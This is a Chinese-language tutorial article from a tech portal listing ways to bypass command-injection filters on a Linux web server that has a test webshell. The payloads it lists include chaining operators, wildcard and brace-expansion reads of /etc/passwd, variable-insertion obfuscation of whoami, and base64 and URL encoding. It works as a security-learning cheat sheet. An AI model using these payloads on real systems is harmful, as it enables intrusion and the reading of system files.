网站首页

人工智能P2P分享搜索全网发布信息网站地图标签大全

当前位置:诺佳网 > 电子/半导体 > 嵌入式技术 >

Linux命令执行Bypass常见姿势

时间:2023-05-22 16:21

人气:

作者:admin

标签: 服务器  逻辑运算  Linux 

导读:部署服务器端为Linux系统的http服务,留存get和post方式的一句话木马,用于命令执行测试。(测试思路可以对话Chatgpt)...
3b99862a-f879-11ed-90ce-dac502259ad0.png  0x00写在前面 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!3b99862a-f879-11ed-90ce-dac502259ad0.png  0x01实践演示

部署服务器端为Linux系统的http服务,留存get和post方式的一句话木马,用于命令执行测试。(测试思路可以对话Chatgpt

3bb18086-f879-11ed-90ce-dac502259ad0.png

linux逻辑运算符

; //分号

3bc4a18e-f879-11ed-90ce-dac502259ad0.png


	

| //仅执行后面那条命令

3bcda9c8-f879-11ed-90ce-dac502259ad0.png

|| //仅执行前面那条命令

3bd67206-f879-11ed-90ce-dac502259ad0.png

& //两条命令都会执行

3bdc6206-f879-11ed-90ce-dac502259ad0.png

&& //两条命令都会执行(注意url编码)

3be64e74-f879-11ed-90ce-dac502259ad0.png

%0a //换行符 %0d //回车符

3bec3334-f879-11ed-90ce-dac502259ad0.png

利用通配符

通配符"?"代表任意一个字符,"*"代表任意个字符

cat%20/etc/pa??wd

3bfbf238-f879-11ed-90ce-dac502259ad0.png

cat%20/etc/pa?*wd

3c04df2e-f879-11ed-90ce-dac502259ad0.png

尝试

cat /*****et*c*/*pas**************************************************swd

3c0e043c-f879-11ed-90ce-dac502259ad0.png

结合上述方式进行组合bypass

echo mt ; whoami

3c271242-f879-11ed-90ce-dac502259ad0.png

使用大括号来绕过空格的限制

{cat,/etc/passwd}

3c2e50ac-f879-11ed-90ce-dac502259ad0.png

{ls,-alth}

3c3b1c9c-f879-11ed-90ce-dac502259ad0.png

命令混淆

whoami
wh$1oami
who$@ami
whoa$*mi

3c42f8d6-f879-11ed-90ce-dac502259ad0.png

命令变形

/*/bin/wh*mi
/us*/*in/who*mi
/*s?/*?n/w?o*i

3c50c556-f879-11ed-90ce-dac502259ad0.png

3c5c7374-f879-11ed-90ce-dac502259ad0.png

3c64d2ee-f879-11ed-90ce-dac502259ad0.png

base64编码方式进行

echo id|base64
echo id|base64

3c7289c0-f879-11ed-90ce-dac502259ad0.png

URL编码

%28%22%65%5c%63%68%6f%20%5c%69%5c%64%7c%62%61%73%65%36%34%22%29%3b

3c784a86-f879-11ed-90ce-dac502259ad0.png


审核编辑 :李倩


温馨提示:以上内容整理于网络,仅供参考,如果对您有帮助,留下您的阅读感言吧!
相关阅读
本类排行
相关标签
本类推荐

CPU | 内存 | 硬盘 | 显卡 | 显示器 | 主板 | 电源 | 键鼠 | 网站地图

Copyright © 2025-2035 诺佳网 版权所有 备案号:赣ICP备2025066733号
本站资料均来源互联网收集整理,作品版权归作者所有,如果侵犯了您的版权,请跟我们联系。

关注微信